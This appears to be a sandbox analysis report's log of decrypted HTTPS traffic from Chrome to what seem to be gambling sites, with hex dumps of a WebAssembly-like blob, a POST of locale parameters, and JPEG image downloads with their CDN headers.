                                                                                                                                                          2024-06-09 22:41:16 UTC1369INData Raw: 20 02 28 02 f4 01 21 07 20 02 20 0c 41 96 83 04 6a 2d 00 00 3a 00 9e 05 20 02 41 9e 05 6a 21 08 20 02 41 e0 01 6a 21 05 0b 20 06 41 27 46 41 01 23 01 1b 04 40 20 05 20 04 20 08 20 07 20 03 41 01 10 1d 41 27 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 20 02 28 02 e0 01 22 04 36 02 80 07 20 09 2d 00 00 41 0f 71 22 0c 41 0f 46 0d 0b 20 02 28 02 e8 01 21 03 20 02 28 02 e4 01 21 07 20 02 20 0c 41 96 83 04 6a 2d 00 00 3a 00 9f 05 41 01 21 0c 20 02 41 9f 05 6a 21 08 20 02 41 d0 01 6a 21 05 0b 20 06 41 28 46 41 01 23 01 1b 04 40 20 05 20 04 20 08 20 07 20 03 41 01 10 1d 41 28 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 28 02 d8 01 21 07 20 02 28 02 d4 01 21 08 20 02 28 02 d0 01 21 04 0c 03 0b 0b 23 01 45 04 40 20 02 41 22 3a 00 a0 05 20 02 41 b0 04 6a 21
                                                                                                                                                          Data Ascii: (! Aj-: Aj! Aj! A'FA#@ AA'#AF#E@ ("6 -Aq"AF (! (! Aj-:A! Aj! Aj! A(FA#@ AA(#AF#E@ (! (! (!#E@ A": Aj!
                                                                                                                                                          2024-06-09 22:41:16 UTC1369INData Raw: 01 23 01 1b 04 40 20 03 20 04 41 a6 8d 04 20 08 20 07 41 02 10 1d 41 34 23 01 41 01 46 0d 10 1a 0b 23 01 45 04 40 20 02 20 02 28 02 c0 03 22 04 36 02 a0 07 20 02 28 02 c8 03 21 07 20 02 28 02 c4 03 21 08 0c 04 0b 0b 20 03 20 02 41 d0 03 6a 23 01 1b 21 03 20 06 41 35 46 41 01 23 01 1b 04 40 20 03 20 04 41 a8 8d 04 20 08 20 07 41 02 10 1d 41 35 23 01 41 01 46 0d 0f 1a 0b 23 01 45 04 40 20 02 20 02 28 02 d0 03 22 04 36 02 a4 07 20 02 28 02 d8 03 21 07 20 02 28 02 d4 03 21 08 0c 03 0b 0b 20 03 20 02 41 e0 03 6a 23 01 1b 21 03 20 06 41 36 46 41 01 23 01 1b 04 40 20 03 20 04 41 aa 8d 04 20 08 20 07 41 02 10 1d 41 36 23 01 41 01 46 0d 0e 1a 0b 23 01 45 04 40 20 02 20 02 28 02 e0 03 22 04 36 02 a8 07 20 02 28 02 e8 03 21 07 20 02 28 02 e4 03 21 08 0c 02 0b 0b 20
                                                                                                                                                          Data Ascii: #@ A AA4#AF#E@ ("6 (! (! Aj#! A5FA#@ A AA5#AF#E@ ("6 (! (! Aj#! A6FA#@ A AA6#AF#E@ ("6 (! (!


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          467192.168.2.55022438.174.148.2344434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC728OUTPOST /mobile-api/v5/origin/getFloat.html HTTP/1.1
                                                                                                                                                          Host: e933002.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          Content-Length: 68
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          Accept: application/json, text/javascript, */*; q=0.01
                                                                                                                                                          Content-Type: application/x-www-form-urlencoded; charset=UTF-8
                                                                                                                                                          X-Requested-With: XMLHttpRequest
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Origin: https://e933002.com
                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                          Referer: https://e933002.com/
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC68OUTData Raw: 6c 6f 63 61 6c 65 3d 7a 68 5f 43 4e 26 74 65 72 6d 69 6e 61 6c 3d 70 63 26 69 73 5f 6e 61 74 69 76 65 3d 66 61 6c 73 65 26 76 65 72 73 69 6f 6e 3d 76 33 30 35 35 26 72 65 73 6f 6c 75 74 69 6f 6e 3d 32 78
                                                                                                                                                          Data Ascii: locale=zh_CN&terminal=pc&is_native=false&version=v3055&resolution=2x
                                                                                                                                                          2024-06-09 22:41:16 UTC21INHTTP/1.1 605 unknow
                                                                                                                                                          2024-06-09 22:41:16 UTC44INData Raw: 53 74 72 69 63 74 2d 54 72 61 6e 73 70 6f 72 74 2d 53 65 63 75 72 69 74 79 3a 20 6d 61 78 2d 61 67 65 3d 32 35 39 32 30 30 30 0d 0a
                                                                                                                                                          Data Ascii: Strict-Transport-Security: max-age=2592000
                                                                                                                                                          2024-06-09 22:41:16 UTC37INData Raw: 44 61 74 65 3a 20 53 75 6e 2c 20 30 39 20 4a 75 6e 20 32 30 32 34 20 32 32 3a 34 31 3a 31 36 20 47 4d 54 0d 0a
                                                                                                                                                          Data Ascii: Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          2024-06-09 22:41:16 UTC60INData Raw: 53 65 74 2d 43 6f 6f 6b 69 65 3a 20 72 6f 75 74 65 3d 31 38 31 64 64 35 61 65 33 39 63 37 61 63 64 38 31 61 64 35 63 61 30 33 39 63 31 34 61 39 35 34 3b 20 50 61 74 68 3d 2f 0d 0a
                                                                                                                                                          Data Ascii: Set-Cookie: route=181dd5ae39c7acd81ad5ca039c14a954; Path=/
                                                                                                                                                          2024-06-09 22:41:16 UTC50INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4f 72 69 67 69 6e 3a 20 68 74 74 70 73 3a 2f 2f 65 39 33 33 30 30 32 2e 63 6f 6d 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Origin: https://e933002.com
                                                                                                                                                          2024-06-09 22:41:16 UTC33INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 4d 65 74 68 6f 64 73 3a 20 2a 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Methods: *
                                                                                                                                                          2024-06-09 22:41:16 UTC30INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 4d 61 78 2d 41 67 65 3a 20 33 36 30 30 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Max-Age: 3600
                                                                                                                                                          2024-06-09 22:41:16 UTC74INData Raw: 41 63 63 65 73 73 2d 43 6f 6e 74 72 6f 6c 2d 41 6c 6c 6f 77 2d 48 65 61 64 65 72 73 3a 20 43 6f 6e 74 65 6e 74 2d 54 79 70 65 2c 41 63 63 65 73 73 2d 54 6f 6b 65 6e 2c 58 2d 52 65 71 75 65 73 74 65 64 2d 57 69 74 68 0d 0a
                                                                                                                                                          Data Ascii: Access-Control-Allow-Headers: Content-Type,Access-Token,X-Requested-With
                                                                                                                                                          2024-06-09 22:41:16 UTC19INData Raw: 68 65 61 64 65 72 53 74 61 74 75 73 3a 20 36 30 35 0d 0a
                                                                                                                                                          Data Ascii: headerStatus: 605
                                                                                                                                                          2024-06-09 22:41:16 UTC23INData Raw: 69 70 53 74 72 3a 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 39 31 0d 0a
                                                                                                                                                          Data Ascii: ipStr: 173.254.250.91


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          468192.168.2.55024090.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC635OUTGET /pc/image-pc/video/dg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 19634
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4cb2"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE6[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,2],EU-GER-frankfurt-GLOBAL1-CACHE7[431],EU-GER-frankfurt-GLOBAL1-CACHE7[410,TCP_MISS,430],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 074b377a378efa3e230f81b9451f2eca
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814504
                                                                                                                                                          X-CCDN-Expires: 2464114
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:16 UTC15752INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:16 UTC3882INData Raw: 30 61 d6 97 35 ad 94 f8 4e cb 32 67 22 47 6c a2 97 23 93 c9 e4 b2 33 e4 b2 f7 d7 39 4c 8d c3 ef b9 bd bc 99 e7 9a 43 e6 f2 39 66 63 4f 33 a2 a1 42 9d b0 09 4d 42 a8 c8 00 00 ec 11 95 6a bd 72 59 d8 92 78 93 33 ef 88 cc e2 e2 44 0c 04 43 b1 23 ae 9e 4e a3 ca 14 06 81 ce 11 2c 7e d3 8a 12 47 70 69 4d 43 0d 26 25 4e a1 17 38 e5 12 c7 2c a4 51 8b 05 a7 85 00 d5 aa 38 89 c5 3b 83 22 04 3b 12 3c d7 17 11 46 ca 36 9d d4 63 40 48 14 fd da 16 38 98 35 59 a8 88 a4 9d c3 bf 7f a6 a2 26 08 c0 3e 5a 64 e3 5b 1d a1 a5 40 e9 a9 9c 64 29 59 94 ab 0a 86 53 50 7e a3 ae a2 71 99 44 9c ba 64 dd e5 c8 5c 3f dd da 64 a4 f7 4d db d3 dc f7 07 42 19 54 fa 7f 66 96 a4 0e ef 28 bc f8 ae a3 c6 06 26 68 bf 43 95 0c 47 4a 8e bd 7c b5 26 21 01 cc 45 97 1f 82 46 b9 c8 b1 9c 44 2d 6c a4
                                                                                                                                                          Data Ascii: 0a5N2g"Gl#39LC9fcO3BMBjrYx3DC#N,~GpiMC&%N8,Q8;";<F6c@H85Y&>Zd[@d)YSP~qDd\?dMBTf(&hCGJ|&!EFD-l


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          469192.168.2.55023990.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC639OUTGET /pc/image-pc/video/allbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC632INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 17878
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-45d6"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[2],EU-GER-frankfurt-EDGE5-CACHE6[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE9[567],EU-GER-frankfurt-GLOBAL1-CACHE8[552,TCP_MISS,565],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: ba5ed658b8caeff7612f3ba92309c63e
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814504
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:16 UTC15752INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm
                                                                                                                                                          2024-06-09 22:41:16 UTC2126INData Raw: 11 a3 48 9d 1d b6 34 2e ec fa e7 a7 b7 99 e3 23 8b cb 07 90 89 8c 89 3a 4b 33 3e 0e 47 2c 75 00 ca 3a 3b d4 8c e3 10 1e 2d 0f 96 24 c6 51 00 6a 0e f9 62 c0 91 9e 06 24 ba b0 72 1c e3 89 7c 8a 78 e3 f1 7b 1c 6f e8 3c 6e 3a e4 70 17 b8 1b 2b 7b 89 26 98 31 b9 9c 41 65 71 6c c9 ee 39 dd b5 2e 82 33 00 49 06 a3 56 ac ec 7c b8 4c 9f 1c bf 51 2c 38 07 90 97 bf 43 ab b5 ae e8 d6 94 06 91 a2 3f a0 0c 78 96 89 19 f2 d4 ca 5d 90 ff 00 90 70 4d 98 92 fa d3 07 9a 9b 1b 6e 0f ea 38 e6 ce e5 f1 b7 5f 77 5a 97 31 c1 7d 24 36 d1 54 90 21 09 22 8d bb 44 8d 5f 44 70 f4 f1 8d 3d 26 51 7e 07 44 24 1b db 10 64 7f 53 c4 f4 e7 a1 2d ee 3e 63 88 c9 bf aa 71 2f ec 91 11 1f a5 8f 6f 2a bb 39 c9 78 5e 5b 99 e5 79 5d d5 9e 43 23 8f 94 b5 ed 96 0d 44 f6 b0 dd e4 24 99 a5 73 78 25 c8
                                                                                                                                                          Data Ascii: H4.#:K3>G,u:;-$Qjb$r|x{o<n:p+{&1Aeql9.3IV|LQ,8C?x]pMn8_wZ1}$6T!"D_Dp=&Q~D$dS->cq/o*9x^[y]C#D$sx%


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          470192.168.2.55023890.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC635OUTGET /pc/image-pc/video/mg_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC634INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15721
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3d69"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE5[3],EU-GER-frankfurt-EDGE5-CACHE4[0,TCP_HIT,1],EU-GER-frankfurt-GLOBAL1-CACHE11[408],EU-GER-frankfurt-GLOBAL1-CACHE12[401,TCP_MISS,404],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 090571d379664387280d43063c3bf157
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814505
                                                                                                                                                          X-CCDN-Expires: 2464115
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:16 UTC15721INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          471192.168.2.55024190.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC635OUTGET /pc/image-pc/video/ag_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 15093
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-3af5"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE3[1],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE4[372],EU-GER-frankfurt-GLOBAL1-CACHE12[365,TCP_MISS,369],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 098cfbc5b94a3eb4ef1a713227a608e4
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814505
                                                                                                                                                          X-CCDN-Expires: 2464136
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                          2024-06-09 22:41:16 UTC15093INData Raw: ff d8 ff e1 00 18 45 78 69 66 00 00 49 49 2a 00 08 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff e1 03 8d 68 74 74 70 3a 2f 2f 6e 73 2e 61 64 6f 62 65 2e 63 6f 6d 2f 78 61 70 2f 31 2e 30 2f 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 36 2d 63 31 33 38 20 37 39 2e 31 35 39 38 32 34 2c 20 32 30 31 36 2f 30 39 2f 31 34 2d 30 31 3a 30 39 3a 30 31 20 20 20 20 20 20 20 20 22 3e 20 3c 72 64 66 3a 52 44 46 20 78 6d
                                                                                                                                                          Data Ascii: ExifII*DuckyPhttp://ns.adobe.com/xap/1.0/<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c138 79.159824, 2016/09/14-01:09:01 "> <rdf:RDF xm


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                          472192.168.2.55024290.84.161.224434460C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                          2024-06-09 22:41:16 UTC639OUTGET /pc/image-pc/video/sunbet_h.jpg HTTP/1.1
                                                                                                                                                          Host: zb-hw.czwygs.com
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                          Referer: https://zb-hw.czwygs.com/pc/240516-03/static/css/t4043.css
                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                          2024-06-09 22:41:16 UTC633INHTTP/1.1 200 OK
                                                                                                                                                          Date: Sun, 09 Jun 2024 22:41:16 GMT
                                                                                                                                                          Content-Type: image/jpeg
                                                                                                                                                          Content-Length: 20027
                                                                                                                                                          Connection: close
                                                                                                                                                          Server: openresty
                                                                                                                                                          Last-Modified: Thu, 22 Mar 2018 06:19:57 GMT
                                                                                                                                                          ETag: "5ab34b0d-4e3b"
                                                                                                                                                          Via: EU-GER-frankfurt-EDGE5-CACHE4[2],EU-GER-frankfurt-EDGE5-CACHE2[0,TCP_HIT,0],EU-GER-frankfurt-GLOBAL1-CACHE14[335],EU-GER-frankfurt-GLOBAL1-CACHE8[330,TCP_MISS,333],1.1 google
                                                                                                                                                          x-hcs-proxy-type: 1
                                                                                                                                                          X-CCDN-CacheTTL: 2592000
                                                                                                                                                          X-CCDN-REQ-ID-46B1: 2671f88a818b14d4d326a1e3c129b8c0
                                                                                                                                                          alt-svc: h3=":443"; ma=2592000
                                                                                                                                                          nginx-hit: 1
                                                                                                                                                          Age: 2814505
                                                                                                                                                          X-CCDN-Expires: 2464135
                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                          Access-Control-Allow-Origin: *
